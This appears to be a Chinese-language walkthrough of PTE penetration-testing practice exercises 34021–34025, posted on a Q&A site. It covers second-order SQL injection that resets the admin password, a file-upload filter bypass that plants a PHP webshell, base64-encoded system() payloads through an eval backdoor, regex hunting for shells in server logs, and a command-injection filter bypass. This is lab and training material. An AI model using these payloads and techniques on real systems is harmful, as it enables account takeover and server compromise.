欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

pte练习题(34021-34025)

时间:2023-08-14
一、34021(二阶sql注入)

1、测试:

(1)用正常用户名密码注册,成功,无漏洞,修改密码,成功

(2)用特殊字符注册,成功,无漏洞,修改密码,不成功,存在sql漏洞。说明前期注册的用户名会影响后面密码修改部分的数据:

        数据插入语句:

        insert xxx value (username,password) //无漏洞

        重置密码:

        updata xxx value (新密码) where username=()//有漏洞

        // 重置密码页面没有出现重新输入username的选项,说明此时的username是引用前面的特殊字符username,说明在updata这条语句中存在sql注入漏洞

        // 二阶sql注入漏洞无法使用sqlmap

(3)尝试一下单引号闭合:注册一个新用户admin'#,然后重置密码;

        admin'#用户被注册,随便在#后面加字符再注册:

        进入重置密码:

        重置成功,说明用户名中的单引号成功将updata语句闭合,#后面的内容被注释掉,那么其实重置的密码就是admin的密码,尝试登录:

        

        成功拿到key1 

二、34022(文件上传突破)

        和34012几乎一样

1、尝试上传各种类型文件,发现.jpg可以上传,但包含一句话木马的.jpg无法上传,burpsuite抓包,发送给repeater找出被注释的关键字,想办法绕过:

        eval被注释,大小写绕过,后缀改为php3,上传成功:

2、访问,antsword连接

三、34023(文件包含)

1、查看view.html页面源代码:

        好像也和之前一样;

        base64内容转义过来是:[@eval(base64_decode($_POST[z0]));]

        也就是输入有Hello和z0,就将z0的内容通过base64转义之后输出。

2、输入Hello=x&z0=system('ls');

        转义后:Hello=x&z0=c3lzdGVtKCdscycpOw==

        

        

        没看到key,返回上一级命令查看:

        Hello=x&z0=system('ls ../');

        转义:

        Hello=x&z0=c3lzdGVtKCdscyAuLi8nKTs=

 

        发现key,查看:

        Hello=x&z0=system('cat ../key.php');

3、查看源代码获取key:

四、34024(日志分析)

1、下载日志文件,用notepad打开

2、查找->正则表达式

3、因为题目中说服务器已经被入侵,那说明入侵成功了,因此404可以忽略,查找200的就可以了;

".*(hack|back|admin|shell).*.php.*" 200

        .*代表任意字符,一般入侵文件是php文件,因此html、js等文件类型可以忽略,黑客部分关键字一般涉及hack、back、admin等,进行匹配查找,关键词后面可能有其他内容,加上.*,php文件后面可能还有内容,因此跟上.*(200前面别忘了空格) 

        查找结果如下:

        一次匹配成功,查看:

4、返回题目中搜索该url查看:

 

        成功拿到key

五、34025(验证主机是否存活)

1、查看目录文件

2、查看上层目录文件,发现key.php

3、获取key.php,分别用cat、grep、大小写绕过尝试,grep成功:

 

 4、查看源代码,拿到key:

 

 

 

 

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。